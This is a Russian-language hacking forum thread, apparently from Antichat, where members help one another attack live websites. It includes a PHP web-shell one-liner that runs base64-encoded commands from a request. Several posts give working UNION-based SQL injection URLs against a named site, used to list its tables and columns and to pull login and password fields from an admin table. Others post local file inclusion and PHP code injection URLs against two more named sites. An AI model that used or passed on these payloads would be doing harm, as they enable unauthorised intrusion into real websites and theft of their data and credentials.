Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так те ссылочки что оставил ettee уже не работают
     
  2. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Попробуй этот
     
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    та попробовать то можно но чем я заменю функцию

    <?php eval(base64_decode($_REQUEST[cmd])); ?>

    ?
     
  4. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+


    Как вывести все поля из этой таблицы?
    В title ответ
     
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
    Где
    0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
     
  6. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.svrwheels.ru
    /index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Where+table_name=0x52726567696f6e7341646d696e73+--+
    Ereee опередил... :)
     
    1 person likes this.
  7. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    Спасибо!
    А как вывести структуру бд?
    как тут http://i.imgur.com/5e1qH.png



    UPD:

    Почему
    http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x52726567696f6e7341646d696e73+--+


    ничего не выводит, кроме ошибки? Что не так?
     
    #19847 foma9999, 19 Mar 2012
    Last edited: 19 Mar 2012
  8. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Структура:
    Code:
    http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20select%20@pro:=0x2727,%20(select%20null%20from%20information_schema.tables%20where%20concat(table_schema,0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0x2c27,table_schema,0x2e,table_name,0x27))limit%200,1))f),3,4,5,6,7,8,9,10--+a
    По-твоему вопросу:
    1. Нельзя после FROM имя таблицы в hex переводит.
    2. Твоя таблица в другой базе:
    Code:
    http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_schema),3,4,5,6,7,8,9,10+FROM+information_schema.tables+limit+51,1--+a
    3. Тебе нужно потренироватся на буржуйских сайтах.
    4. Пустая таблица:
    Code:
    http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u261330_catalog.RregionsAdmins+limit+0,1--+a
    В <title> написано, что записей "0".
     
    #19848 Ereee, 19 Mar 2012
    Last edited: 19 Mar 2012
  9. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    что значит а после коммента?
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    дамы и господа прежде чем задавать какиелибо вопросы по SQL-иньекциям ознакомтись пожалуйсто со статьей http://forum.antichat.net/thread43966.html а потом только выесняйте непонятные моменты! ("а" обсолютно ничего не значит после комента, так как она закоментирована)
     
    _________________________
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    А я думал браузер удаляет пробел, если он в самом концу URL. Т.е. для браузера:
    -- =--
    А если сделать -- a, то не будет удалять пробел. Я так думал.
     
  12. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Ты правильно думал, только не браузер его удаляет, а есть приличный шанс нарваться например на trim().

    winstrool у тебя все посты такие чёткие, что лучше тебе не писать совсем, а то ещё с группы выгонят не дай бог :)
     
    3 people like this.
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а почему например тут так не получается?
    http://www2.mati.ru/english/index.php?path=../../../../../../../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E

    или тут
    http://bombaticket.ru/pg.php?p=../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E
     
    #19853 qaz, 20 Mar 2012
    Last edited: 20 Mar 2012
  14. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    а ты через curl пробовал отсылать запрос?
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ну да
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Про инклуд, есть миллион статей, в которых описываются какие именно нужно инклюдить файлы, зачем везде инклюдить /proc/self/cmdline в который ничего не попадает из вашего запроса к серверу?
     
    _________________________
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А как такое возможно в phpMyAdmin есть 4 одинаковых пользователя но у двоих из них File_priv Y а у двоих N,как это вообще понимать?
     
  18. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    У них host одинаковый? Если нет, то понимать адекватно.
    Если да - то админы мудаки.
     
  19. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    http://www.allsoch.ru/soch/works.php?AuthorID=-3

    Это является sql-inj?
    Возможно ли раскрутить?
     
  20. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Дыры нету, просто при отрицательном параметре ошибка.
     
Thread Status:
Not open for further replies.